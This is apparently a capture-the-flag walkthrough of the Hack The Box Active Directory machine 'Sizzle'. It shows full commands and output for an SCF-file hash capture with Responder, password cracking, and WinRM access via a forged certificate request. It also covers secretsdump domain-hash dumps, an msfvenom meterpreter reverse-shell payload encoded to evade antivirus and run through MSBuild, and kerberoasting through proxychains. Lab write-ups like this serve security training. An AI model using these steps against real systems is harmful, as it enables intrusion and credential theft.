htb-sizzle

Sizzle was a great machine, everything was great. It was very realistic, fun and of course challenging. Personally one of my favorites and one of the best Active Directory boxxes I have ever solved. It starts with getting write access to a folder in an smb share, a simple scf file attack with responder and john can give me a password for a user. With that password, I was able to generate a certificate request and get a certificate and then a WinRm session. After that comes the most challenging part of the box that bypasses antivirus, kerberoasting, and privilege escalation, but before we do that, we’ll take an unintentional look at it first. That was the box for short, it’s a Windows box and the IP is 10.10.10.103, I added it to / etc / hosts like sizzle.htb. 


Nmap

As always, first an nmap scan

root @ kali: ~ / htb / sizzle # nmap -sV -sT -sC sizzle.htb
Starting Nmap 7.80 (https://nmap.org) at 2020-01-02 06:30 EST
Nmap scan report for sizzle.htb (10.10.10.103)
Host is up (0.12s latency).
Not shown: 990 filtered ports
PORT STATE SERVICE VERSION
21 / tcp open ftp Microsoft ftpd
| _ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| _ SYST: Windows_NT
53 / tcp open domain?
| fingerprint strings:
| DNSVersionBindReqTCP:
| version
| _ bind
135 / tcp open msrpc Microsoft Windows RPC
139 / tcp open netbios-ssn Microsoft Windows netbios-ssn
389 / tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName = sizzle.HTB.LOCAL
| Subject Alternative Name: othername: <unsupported>, DNS: sizzle.HTB.LOCAL
| Not valid before: 2020-01-02T11: 22: 14
| _Not valid after: 2021-01-01T11: 22: 14
| _ssl-date: 2020-01-02T11: 35: 10 + 00: 00; + 1m11s from scanner time.
445 / tcp open microsoft ds?
464 / tcp open kpasswd5?
593 / tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636 / tcp open ssl / ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName = sizzle.HTB.LOCAL
| Subject Alternative Name: othername: <unsupported>, DNS: sizzle.HTB.LOCAL
| Not valid before: 2020-01-02T11: 22: 14
| _Not valid after: 2021-01-01T11: 22: 14
| _ssl-date: 2020-01-02T11: 35: 09 + 00: 00; + 1m11s from scanner time.
3268 / tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName = sizzle.HTB.LOCAL
| Subject Alternative Name: othername: <unsupported>, DNS: sizzle.HTB.LOCAL
| Not valid before: 2020-01-02T11: 22: 14
| _Not valid after: 2021-01-01T11: 22: 14
| _ssl-date: 2020-01-02T11: 35: 09 + 00: 00; + 1m11s from scanner time.
1 service unrecognized despite returning data. If you know the service / version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service:
SF-Port53-TCP: V = 7.80% I = 7% D = 1/2% Time = 5E0DD478% P = x86_64-pc-linux-gnu% r (DNSVe
SF: rsionBindReqTCP, 20, "\ 0 \ x1e \ 0 \ x06 \ x81 \ x04 \ 0 \ x01 \ 0 \ 0 \ 0 \ 0 \ 0 \ 0 \ x07version \ x
SF: 04bind \ 0 \ 0 \ x10 \ 0 \ x03 ");
Service Info: Host: SIZZLE; OS: Windows; CPE: cpe: / o: microsoft: windows

Host script results:
| _clock-skew: mean: 1m10s, deviation: 0s, median: 1m10s
| smb2-security-mode:
| 2.02:
| _ Message signing enabled and required
| smb2-time:
| date: 2020-01-02T11: 34: 31
| _ start_date: 2020-01-02T11: 31: 19

Service detection performed. Please report any incorrect results at https://nmap.org/submit/.
Nmap done: 1 IP address (1 host up) scanned in 228.22 seconds
root @ kali: ~ / htb / sizzle #

 

We have many ports, we have ftp on port 21, dns on port 53, http on port 80, smb and ldap. We also see that the domain is HTB.LOCAL and commonName is sizzle.htb.local so I added it to / etc / hosts:


HTTP

I checked the http server and the index only had this gif:

Then I turned gobuster en DirB

root @ kali: ~ / htb / sizzle # gobuster dir -u http://10.10.10.103 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40
================================================== =============
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
================================================== =============
[+] Url: http://10.10.10.103
[+] Threads: 40
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster / 3.0.1
[+] Timeout: 10s
================================================== =============
2020/01/02 06:33:35 Starting gobuster
================================================== =============
/ images (Status: 301)
/ Images (Status: 301)
/ IMAGES (Status: 301)

root @ kali: ~ / htb / sizzle # dirb http://10.10.10.103

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Jan 2 07:48:37 2020
URL_BASE: http://10.10.10.103/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.103/ ----
==> DIRECTORY: http://10.10.10.103/aspnet_client/                                                    
==> DIRECTORY: http://10.10.10.103/certenroll/                                                       
+ http://10.10.10.103/certsrv (CODE: 401 | SIZE: 1293)

/certenroll seems interesting, but is unfortunately prohibited:

Time to check smb.


SMB, SCF File Attack, Amanda’s Credentials

The first thing we need to know are the “shares”, we can use smbclient to list the “shares”:
smbclient --list //sizzle.htb/ -U ""

I noticed that there was a share for Active Directory Certificate Services. Most likely / certsrv is on the web server:
http://sizzle.htb/certsrv

root@kali:~/htb# smbclient //sizzle.htb/"Department Shares" -U ""
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\'s password: 
Try "help" to get a list of possible commands.
smb: \>

There were many directories, but 2 that allowed writing: ZZ_ARCHIVEand Users/Public.

We are looking for references. Since we can write to any of the folders, we may be able to apply an scf file attack. You can go  here . read over. We are going to put an scffile in Users/Public. It looks like this:

Then we will perform responder. When a user browses through that folder, he automatically tries to connect to my box via smb, that’s when responder catches the hashes. More info in the link above.

 

root @ kali: / tmp # responder -I tun0
__
. ----. -----. -----. -----. -----. ----- .-- | |. ----- .----.
| _ | -__ | __ - | _ | _ | | _ || -__ | _ |
| __ | | _____ | _____ | __ | _____ | __ | __ | _____ || _____ | __ |
| __ |

NBT-NS, LLMNR & MDNS Responder 2.3.4.0


-cut-

[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.70]
Challenge set [random]
Don't Respond To Names ['ISATAP']

[+] Listening for events ...
[SMB] NTLMv2-SSP Client: 10.10.10.103
[SMB] NTLMv2-SSP Username: HTB \ amanda
[SMB] NTLMv2-SSP Hash: amanda :: HTB: a6d23653a4821fc8: 03851040934EDC44A5A58C61B9C048AE:
[*] Skipping previously captured hash for HTB \ amanda

responder captured hash for a user named Amanda. Let’s crack it with John:

The password is Ashare1972


Requesting a Certificate, WinRm Session as amanda

I tried to access certenroll as amanda and it worked fine

root @ kali: ~ / htb / sizzle # smbclient //sizzle.htb/"CertEnroll "-U amanda 
Enter WORKGROUP \ amanda's password: Ashare1972
Try" help "to get a list of possible commands. smb: \> ls   . D 0 Tue Jun 30 13:47:19 2020 .. D 0 Tue Jun 30 13:47:19 2020 HTB-SIZZLE-CA+.crl A 721 Tue Jun 30 13:47:19 2020 HTB-SIZZLE-CA.crl A 909 Tue Jun 30 13:47:19 2020 nsrev_HTB-SIZZLE-CA.asp A 322 Mon Jul 2 16:36:05 2018 sizzle.HTB.LOCAL_HTB-SIZZLE-CA.crt A 871 Mon Jul 2 16:36:03 2018

So I went to /certsrvand used amanda’s credentials to authenticate

Now it is time to get a certificate. But wait, what is the certificate for?
A full full nmapscan shows that WinRmports are open:
nmap -p- -T5 -vvv --max-retries 1 sizzle.htb

nmap -p 5985,5986 -sV -sT -sC sizzle.htb

Port 5985 uses http while 5986 uses https. When I got the data from Amanda I tried to connect to port 5985 and it didn’t work so we do it through port 5986 which is why we need a certificate. (If you don’t know how to connect via WinRm, we’ll get to that later.)
We’ll generate a certificate request and a private key:
openssl req -newkey rsa:2048 -nodes -keyout request.key -out request.csr

Then we will make an advanced certificate request, paste our request and download the certificate (base64 encoded)

Now we can use WinRm, but what is WinRm?

WinRm is not intended to be used from Linux, but luckily there is Ruby library . That’s how we connect.

I used Alamot’s shell and added some for the certificate and key:

root @ kali: ~ / htb / sizzle # cat htb-sizzle-winrm.rb 
#! / usr / bin / ruby
require 'winrm'

# Author: Alamot

conn = WinRM :: Connection.new ( 
endpoint: 'https://10.10.10.103:5986/wsman',
transport:: ssl,
client_cert: '/root/htb/sizzle/certnew.cer',
client_key: '/root/htb/sizzle/request.key',
: no_ssl_peer_verification => true
)

command = ""

conn.shell (: powershell) do | shell |
until command == "exit \ n" do
output = shell.run ("- join ($ id, 'PS', $ (whoami), '@', $ env: computername, '', $ ((gi $ pwd) .Name), '>')" )
print (output.output.chomp)
command = gets 
output = shell.run (command) do | stdout, stderr |
STDOUT.print stdout
STDERR.print stderr
end
end 
puts "Exiting with code # {output.exitcode}"
end

And it worked:

But there was no user.txt:


Stored NTLM Hashes, Secretsdump, Privilege Escalation

Due to file system enumeration I found a file file.txtin it C:\Windows\System32. That file had NTLM hashes for all users!

root @ kali: ~ / htb / sizzle # ruby htb-sizzle-winrm.rb  
PS htb \ amanda @ SIZZLE Documents> type C: \ Windows \ System32 \ file.txt
krbtgt: 502: aad3b435b51404eeaad3b435b51404ee: 296ec447eee58283143efbd5d39408c8 :::
Administrator: 500: aad3b435b51404eeaad3b435b51404ee: c718f548c75062ada93250db208d3178 :::

Domain User ID Hash
------ ---- - ----
HTB.LOCAL Guest 501 - 
amanda: 1104: aad3b435b51404eeaad3b435b51404ee: 7d0516ea4b6ed084f3fdf71c47d9beb3 :::
mrb3n: 1105: aad3b435b51404eeaad3b435b51404ee: bceef4f6fe9c026d1d8dec8dce48adef :::
mrlky: 1603: aad3b435b51404eeaad3b435b51404ee: bceef4f6fe9c026d1d8dec8dce48adef :::
PS htb \ amanda @ SIZZLE Documents>

I honestly don’t know why. After resetting the machine, the file was still there. I don’t know if the creator made an accidental mistake, but at least let’s see how we can use that.
That admin hash was useless, I tried with SMB, I cracked it, tried Psexec. It did not work. I cracked mrlky’s hash:

The password was Football # 7 , I used it with secretsdump.py from impacket and got another hash from the administrator:

root@kali:~/htb# secretsdump.py -just-dc mrlky@sizzle.htb.local 
Impacket v0.9.22.dev1+20200629.145357.5d4ad6cc - Copyright 2020 SecureAuth Corporation

Password:Football#7
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792e0ac3a162c9267:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:296ec447eee58283143efbd5d39408c8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
amanda:1104:aad3b435b51404eeaad3b435b51404ee:7d0516ea4b6ed084f3fdf71c47d9beb3:::
mrlky:1603:aad3b435b51404eeaad3b435b51404ee:bceef4f6fe9c026d1d8dec8dce48adef:::
sizzler:1604:aad3b435b51404eeaad3b435b51404ee:d79f820afad0cbc828d79e16a6f890de:::
SIZZLE$:1001:aad3b435b51404eeaad3b435b51404ee:90fff1f794a2c3b1b2cd892a1f48c7fb:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:e562d64208c7df80b496af280603773ea7d7eeb93ef715392a8258214933275d
Administrator:aes128-cts-hmac-sha1-96:45b1a7ed336bafe1f1e0c1ab666336b3
Administrator:des-cbc-md5:ad7afb706715e964
krbtgt:aes256-cts-hmac-sha1-96:0fcb9a54f68453be5dd01fe555cace13e99def7699b85deda866a71a74e9391e
krbtgt:aes128-cts-hmac-sha1-96:668b69e6bb7f76fa1bcd3a638e93e699
krbtgt:des-cbc-md5:866db35eb9ec5173
amanda:aes256-cts-hmac-sha1-96:60ef71f6446370bab3a52634c3708ed8a0af424fdcb045f3f5fbde5ff05221eb
amanda:aes128-cts-hmac-sha1-96:48d91184cecdc906ca7a07ccbe42e061
amanda:des-cbc-md5:70ba677a4c1a2adf
mrlky:aes256-cts-hmac-sha1-96:b42493c2e8ef350d257e68cc93a155643330c6b5e46a931315c2e23984b11155
mrlky:aes128-cts-hmac-sha1-96:3daab3d6ea94d236b44083309f4f3db0
mrlky:des-cbc-md5:02f1a4da0432f7f7
sizzler:aes256-cts-hmac-sha1-96:85b437e31c055786104b514f98fdf2a520569174cbfc7ba2c895b0f05a7ec81d
sizzler:aes128-cts-hmac-sha1-96:e31015d07e48c21bbd72955641423955
sizzler:des-cbc-md5:5d51d30e68d092d9
SIZZLE$:aes256-cts-hmac-sha1-96:030d88489850a42ac3e92454f7a66f61189450943a2d9836d7b376e5236e12c5
SIZZLE$:aes128-cts-hmac-sha1-96:9032103c089fb008ad9cde29b3a6132f
SIZZLE$:des-cbc-md5:f81a64e0a1a20eb5
[*] Cleaning up...

It wasn’t cracking, I tried the psexec metasploit module and for some reason it didn’t work so I used the hash with smb to access C $ then downloaded the flags.

root @ kali: ~ / htb / sizzle # smbclient //sizzle.htb/C$ -U "Administrator" --pw-nt-hash f6b7160bfc91823792e0ac3a162c9267
Try "help" to get a list of possible commands.
smb: \> cd users
smb: \ users \> cd administrator
smb: \ users \ administrator \> cd desktop
smb: \ users \ administrator \ desktop \> ls
 . DR 0 Tue Jul 10 18:24:52 2018
 .. DR 0 Tue Jul 10 18:24:52 2018
 desktop.ini AHS 282 Mon Jul 2 23:00:22 2018
 root.txt A 32 Tue Jul 10 18:24:58 2018
smb: \ users \ administrator \ desktop \>

Now forget that we saw that, Let’s try something more realistic.


Backtrack

Back to the WinRmsession as amanda, let’s examine our environment.
There was AppLocker:

Antivirus:

We were even in Constrained Language Mode in PowerShell:

Since this was an Active Directory environment I wanted to do kerberoasting, but Invoke-Kerberoast.ps1needed Full Language Mode, I couldn’t use GetUserSPNs.pybecause the services were internal only. And my attempts to evade the antivirus failed. I could bypass the constrained language mode with PSByPassCLM and still couldn’t use
Invoke-Kerberoast.ps1. AppLocker is easy to bypass so it wasn’t an issue. But I had to bypass the antivirus.


Bypassing AV

CLM / AppLocker Break Out

Enumeration

The shell I have is quite limited. I can see that I’m in constrained language mode, and that AppLocker is limiting what I can run.

PS htb\amanda@SIZZLE v2.0.50727> $executioncontext.sessionstate.languagemode
ConstrainedLanguage   
PS htb\amanda@SIZZLE Documents> Get-AppLockerPolicy -Effective -XML

I found this article and this POC
First time I created the payload like this:

msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.xx.xx LPORT=1339 -f csharp

And I added the shellcode to the POC and applied the exploit:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe c:\windows\system32\spool\drivers\color\shellcode.xml

The antivirus detected it. I added an encoder and 100 iterations and tried again:

msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.xx.xx LPORT=1339 -e x86/shikata_ga_nai -i 100 -f csharp

Then I added the shellcode to shellcode.xml
shellcode.xmlhttps://github.com/puckiestyle/pentest/blob/master/shellcode.xml

root @ kali: ~ / htb / sizzle # python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.103 - - [02 / Jan / 2020 09:45:17] "GET /shellcode.xml HTTP / 1.1" 200 -
PS htb \ amanda @ SIZZLE color> Invoke-WebRequest -o shellcode.xml http://10.10.16.70/shellcode.xml 
PS htb \ amanda @ SIZZLE color> c: \ Windows \ Microsoft.NET \ Framework \ v4.0.30319 \ MSBuild.exe c: \ windows \ system32 \ spool \ drivers \ color \ shellcode.xml
Microsoft (R) Build Engine version 4.6.1586.0
[Microsoft .NET Framework, version 4.0.30319.42000]
Copyright (C) Microsoft Corporation. All rights reserved.

Build started 1/2/2020 9:52:59 AM.

This time it worked, and I got a meter preter session!

msf5 exploit (multi / handler)> exploit

[*] Started reverse TCP handler on 10.10.16.70:1339 
[*] Sending stage (179779 bytes) to 10.10.10.103
[*] Meterpreter session 1 opened (10.10.16.70:1339 -> 10.10.10.103:57175) at 2020-01-02 09:51:50 -0500

meterpreter> sysinfo
Computer: SIZZLE
OS: Windows 2016 (Build 14393).
Architecture: x64
System Language: en_US
Meter preter: x86 / windows
meter preter>

 


Kerberoasting, Privilege Escalation

Now we have a meterpretersession, we can route the internal subnet, use a proxy then use GetUserSPNs.pyand see if any user is kerberoastable.
First thing is to configure proxychainsto use port 8080:
/etc/proxychains.conf

Then we will use auxiliary/server/socks4ato add the route and set up the proxy:

route add 10.10.10.0 255.255.255.0 1this adds a route of the whole internal subnet where 1is the session number.
Now we are ready. Let’s kerberoast!

root @ kali: ~ / htb / sizzle # proxychains GetUserSPNs.py -request -dc-ip 10.10.10.103 HTB.LOCAL / amanda: Ashare1972
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

| S-chain | - <> - 127.0.0.1:9050-<><>-10.10.10.103:389-<><>-OK
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon 
-------------------- ----- ------------------------- ---------------------------- ---------------------- ---- --------------------------
http / sizzle mrlky CN = Remote Management Users, CN = Builtin, DC = HTB, DC = LOCAL 2018-07-10 14: 08: 09.536421 2018-07-12 10: 23: 50.871575

| S-chain | - <> - 127.0.0.1:9050-<><>-10.10.10.103:88-<><>-OK
| S-chain | - <> - 127.0.0.1:9050-<><>-10.10.10.103:88-<><>-OK
| S-chain | - <> - 127.0.0.1:9050-<><>-10.10.10.103:88-<><>-OK
$ krb5tgs $ 23 $ * mrlky $ HTB.LOCAL $ http / sizzle * $ 74c34fa35f660924e4aee5fe2a825cbb $ 2912898f4e75794e6750066f47fb2ebcf0b320282ca6b9ff00b0572b39f45795a6d8367d2bbd073e18e8a669117d4e6dd2af17201e7466adadcecef7dccc52b31d553b9064aabf7de0e2200f2b4edcb214e198c1082cb65879dad99e4be078c9621a2f75a34e5175bad3a22b5c8f453caa957e35ef3698d758c4e5648b9b7a2046aed03bf772beb11e48c223c432263fda8aeacacc5a06cdb40d77ade4b5f3346ce37fdad2d346b79be4adc0ff7c7c59413c5083cfddcec1263685af7eb088d7a51803f5761a4e4b232f84bd24df54ec4bad85b57b12d865f0969b0871d038dc5f8acac9acd1592c41b39c4c027f991c96d0d869f00cfab092311baff1d9ba880c858c678e486453775223746a01a6c893f74a3ff13e972a909b72b842561505b6ec74dedb2a5046184d3b3a6445a2f65c3715db38379d50f542c77fd297b26fd22f30f3198006774044afa48336ec8f4c539f296128b861e4e67767921b7c2ab149ae5d415098086e4e23ff305b684f078bc7a89fca3ebefd5a7f3d189cd6ae10176dc9b8fef8e6a93a6d820ad11948247d130647d3453df0755ccc1450c188ed3894b270fd052934674626d8685df1f12e32cbf2cf60a1c9940a68bb0e89e70ffb2211f6d758be7442ba13d6646b4afecdede2fb2449b96101709e16757c2c7e1366e4aea3
root @ kali: ~ / htb / sizzle #

User mrlkywas kerberoastable and we have a hash, let’s give this to john:

root @ kali: ~ / htb / sizzle # john --wordlist = / usr / share / wordlists / rockyou.txt mrlky.hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS ​​etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Football # 7 (?)
1g 0: 00: 00: 20 DONE (2020-01-02 10:16) 0.04780g / s 533806p / s 533806c / s 533806C / s Forever29Life05..Fokatrepa
Use the "--show" option to display all of the cracked passwords reliably
Session completed

The password is Football#7, now we can reuse secretdump.py and do the same as before:

root @ kali: ~ / htb / sizzle # secretsdump.py sizzle.htb.local / mrlky: Football#7@sizzle.htb.local
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain \ uid: rid: lmhash: nthash)
[*] Using the DRSUAPI method to get NTDS.DIT ​​secrets
Administrator: 500: aad3b435b51404eeaad3b435b51404ee: f6b7160bfc91823792e0ac3a162c9267 :::
Guest: 501: aad3b435b51404eeaad3b435b51404ee: 31d6cfe0d16ae931b73c59d7e0c089c0 :::
krbtgt: 502: aad3b435b51404eeaad3b435b51404ee: 296ec447eee58283143efbd5d39408c8 :::
DefaultAccount: 503: aad3b435b51404eeaad3b435b51404ee: 31d6cfe0d16ae931b73c59d7e0c089c0 :::
amanda: 1104: aad3b435b51404eeaad3b435b51404ee: 7d0516ea4b6ed084f3fdf71c47d9beb3 :::
mrlky: 1603: aad3b435b51404eeaad3b435b51404ee: bceef4f6fe9c026d1d8dec8dce48adef :::
sizzler: 1604: aad3b435b51404eeaad3b435b51404ee: d79f820afad0cbc828d79e16a6f890de :::
SIZZLE $: 1001: aad3b435b51404eeaad3b435b51404ee: 0979e102285334d59af1854ac247db8b :::
[*] Kerberos keys grabbed
Administrator: aes256-cts-hmac-sha1-96: e562d64208c7df80b496af280603773ea7d7eeb93ef715392a8258214933275d
Administrator: aes128-cts-hmac-sha1-96: 45b1a7ed336bafe1f1e0c1ab666336b3
Administrator: des-cbc-md5: ad7afb706715e964
krbtgt: aes256-cts-hmac-sha1-96: 0fcb9a54f68453be5dd01fe555cace13e99def7699b85deda866a71a74e9391e
krbtgt: aes128-cts-hmac-sha1-96: 668b69e6bb7f76fa1bcd3a638e93e699
krbtgt: des-cbc-md5: 866db35eb9ec5173
amanda: aes256-cts-hmac-sha1-96: 60ef71f6446370bab3a52634c3708ed8a0af424fdcb045f3f5fbde5ff05221eb
amanda: aes128-cts-hmac-sha1-96: 48d91184cecdc906ca7a07ccbe42e061
amanda: des-cbc-md5: 70ba677a4c1a2adf
mrlky: aes256-cts-hmac-sha1-96: b42493c2e8ef350d257e68cc93a155643330c6b5e46a931315c2e23984b11155
mrlky: aes128-cts-hmac-sha1-96: 3daab3d6ea94d236b44083309f4f3db0
mrlky: des-cbc-md5: 02f1a4da0432f7f7
sizzler: aes256-cts-hmac-sha1-96: 85b437e31c055786104b514f98fdf2a520569174cbfc7ba2c895b0f05a7ec81d
sizzler: aes128-cts-hmac-sha1-96: e31015d07e48c21bbd72955641423955
sizzler: des-cbc-md5: 5d51d30e68d092d9
SIZZLE $: aes256-cts-hmac-sha1-96: b2fdd1cec387ef3bee7799b798b665df34acd3b8f3fc15ef8d5e621e77abc5dd
SIZZLE $: aes128-cts-hmac-sha1-96: b17b20014028f2d7f99d03bc5f8c2d1f
SIZZLE $: des-cbc-md5: 6b45e586077a4f57
[*] Cleaning up ...

That is it !

Consulted literature: https://0xrick.github.io/hack-the-box/sizzle/

Author – Puckiestyle

Author: Puckiestyle